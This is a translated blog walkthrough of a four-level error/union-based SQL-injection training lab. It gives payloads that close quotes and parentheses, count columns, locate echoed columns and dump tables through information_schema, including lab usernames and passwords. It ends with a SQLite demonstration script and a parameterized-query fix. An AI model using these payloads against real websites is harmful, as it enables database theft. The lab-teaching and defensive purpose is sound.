Error-based injection: four levels

Addresses of the four levels:

http://59.63.200.79:8812/New/ErrorBased/RankOne/sql-one/

http://59.63.200.79:8812/New/ErrorBased/RankTwo/sql-two/

http://59.63.200.79:8812/New/ErrorBased/RankThree/sql-three/

http://59.63.200.79:8812/New/ErrorBased/RankFour/sql-four/

Error-based injection, level 1:
1. First test whether the parameter is injectable: request id=1, then id=1'. If the page changes (an error or a different result), the input reaches the SQL query unescaped.
2. Request id=1' order by 1, 2, 3, 4 ... to find the number of columns in the query; the id value has to be closed with ' first. The largest n for which order by n still works is the column count (here 3, which is why the union payloads below use three values).
[image]

3. Use a UNION with a non-matching id to find which columns are echoed on the page:

  1. ?id=9.999' union select 1,2,3 --+ # comments out the trailing limit


The page shows 2 and 3, so columns 2 and 3 are the echo points.
4. Use the database's built-in information_schema to list all table and column names:

  1. Table of every table in every database: information_schema.tables; its table_schema column holds the database name, so filter on database() to list the tables of the current database.
  2. Table of every column in every table: information_schema.columns; its table_name column holds the table name and column_name the column name, so filter on a table name to list its columns.
  1. ?id=9.999' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =database()--+


Knowing the table name, query its column names:

  1. ?id=9.999' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='zkaq'--+


Knowing the table and column names, query the values inside:

  1. ?id=9.999' union select 1,group_concat(zKaQ),3 from zkaq --+
  2. ?id=1' union select 1,2,group_concat(zKaQ) from zkaq limit 1,1--+


All values of all detected tables can be dumped the same way:
Table names: emails, referers, uagents, users, zkaq
zkaq columns: Flag, zKaQ
emails columns: id, email_id
referers columns: id, referer, ip_address
uagents columns: id, uagent, ip_address, username
users columns: USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username (zkz, zkaq), password (zkz, zkaq)
Note that USER, CURRENT_CONNECTIONS and TOTAL_CONNECTIONS are not part of the lab's users table: a filter of only where table_name='users' also matches performance_schema.users. Add and table_schema=database() to the information_schema.columns query to restrict it to the current database.

Error-based injection, level 2
Level 2 is the same as level 1 except that the value after ?id= is numeric, so no closing ' is needed.

Error-based injection, level 3
Level 3: requesting ?id=1 gives the error shown in the screenshot below:

The error shows the value is wrapped in parentheses and single quotes, so we need to close the opening quote and parenthesis and comment out the rest: ?id=1') and 1=1 --+
The remaining steps are the same as in the first two levels:

  1. ?id=9.999') union select 1,2,group_concat(zKaQ) from zkaq --+ # close the opening quote and parenthesis, comment out the trailing part

Error-based injection, level 4
Level 4 is like level 3, only with double quotes instead of single quotes, and is closed the same way:

  1. ?id=1") and 1=1 --+

The remaining steps are the same as above:

  1. ?id=9.999")%20 union select 1,2,group_concat(zKaQ) from zkaq --+
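As an added worked example (not code from the original post or from the lab), the script below rebuilds the four levels' query shapes against an in-memory SQLite database and runs the page's steps 1 to 4 against each closing style (', none, ') and ")), next to the parameterized query that stops the same payloads. Everything in it is an assumption made to mirror the page: the SELECT templates, the rendered columns 2 and 3, and the contents of zkaq and users are constructed; because SQLite has no information_schema, sqlite_master and pragma_table_info stand in for information_schema.tables and information_schema.columns; the payloads use the decoded form of --+, which is "-- "; level 4's double-quoted value relies on SQLite's double-quoted-string fallback, which is on in default builds.

```python
import sqlite3

# Assumed closing string per level, reconstructed from the page's payloads.
CLOSERS = {1: "'", 2: "", 3: "')", 4: '")'}
COMMENT = "-- "  # what --+ decodes to once the URL is parsed (MySQL needs the space)

# Hypothetical query templates for the four levels; column names follow the page.
TEMPLATES = {
    1: "SELECT id, flag, zKaQ FROM zkaq WHERE id='{id}' LIMIT 1",
    2: "SELECT id, flag, zKaQ FROM zkaq WHERE id={id} LIMIT 1",
    3: "SELECT id, flag, zKaQ FROM zkaq WHERE id=('{id}') LIMIT 1",
    4: 'SELECT id, flag, zKaQ FROM zkaq WHERE id=("{id}") LIMIT 1',
}


def make_db():
    """Constructed in-memory stand-in for the lab database (all contents invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zkaq (id INTEGER, flag TEXT, zKaQ TEXT)")
    conn.executemany("INSERT INTO zkaq VALUES (?, ?, ?)",
                     [(1, "flag{one}", "alpha"), (2, "flag{two}", "beta"), (3, "flag{three}", "gamma")])
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [(1, "zkz", "zkz"), (2, "zkaq", "zkaq")])
    return conn


def vulnerable_page(conn, level, user_id):
    """The bug: ?id is string-concatenated into SQL. The 'page' shows columns 2 and 3 of the first row."""
    sql = TEMPLATES[level].format(id=user_id)
    row = conn.execute(sql).fetchone()
    return None if row is None else (row[1], row[2])


def column_count(conn, level, max_cols=10):
    """Step 2: ORDER BY n works while n <= number of selected columns; the first failure reveals it."""
    close = CLOSERS[level]
    for n in range(1, max_cols + 1):
        try:
            vulnerable_page(conn, level, f"1{close} order by {n} {COMMENT}")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def echo_points(conn, level):
    """Step 3: union in the markers 1,2,3 behind a non-matching id; markers that reach the page are echo points."""
    close = CLOSERS[level]
    shown = vulnerable_page(conn, level, f"9.999{close} union select 1,2,3 {COMMENT}")
    return [m for m in (1, 2, 3) if shown and m in shown]


def dump(conn, level, expression):
    """Step 4: place an arbitrary 'expr FROM table ...' in echoed column 3 and read it off the page."""
    close = CLOSERS[level]
    return vulnerable_page(conn, level, f"9.999{close} union select 1,2,{expression} {COMMENT}")


def safe_page(conn, user_id):
    """Hardened form: the value is bound as a parameter, so quotes, parentheses and comments are just data."""
    row = conn.execute("SELECT id, flag, zKaQ FROM zkaq WHERE id=? LIMIT 1", (user_id,)).fetchone()
    return None if row is None else (row[1], row[2])


if __name__ == "__main__":
    db = make_db()
    for lvl in (1, 2, 3, 4):
        try:
            print("level", lvl, "columns:", column_count(db, lvl), "echo points:", echo_points(db, lvl))
            # SQLite analogues of information_schema.tables / information_schema.columns
            print("  tables:", dump(db, lvl, "group_concat(name) from sqlite_master where type='table'"))
            print("  zkaq columns:", dump(db, lvl, "group_concat(name) from pragma_table_info('zkaq')"))
            print("  zkaq values:", dump(db, lvl, "group_concat(zKaQ) from zkaq"))
        except sqlite3.OperationalError as err:  # level 4 needs SQLite's double-quoted-string fallback
            print("level", lvl, "query failed:", err)
    print("parameterized:", safe_page(db, "9.999' union select 1,2,3 -- "))
```

The same dump() call with information_schema.tables where table_schema=database() is the MySQL form the page uses; only the catalog table changes, the union and echo-point logic do not.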

Origin www.cnblogs.com/Qiuzhiyu/p/11666703.html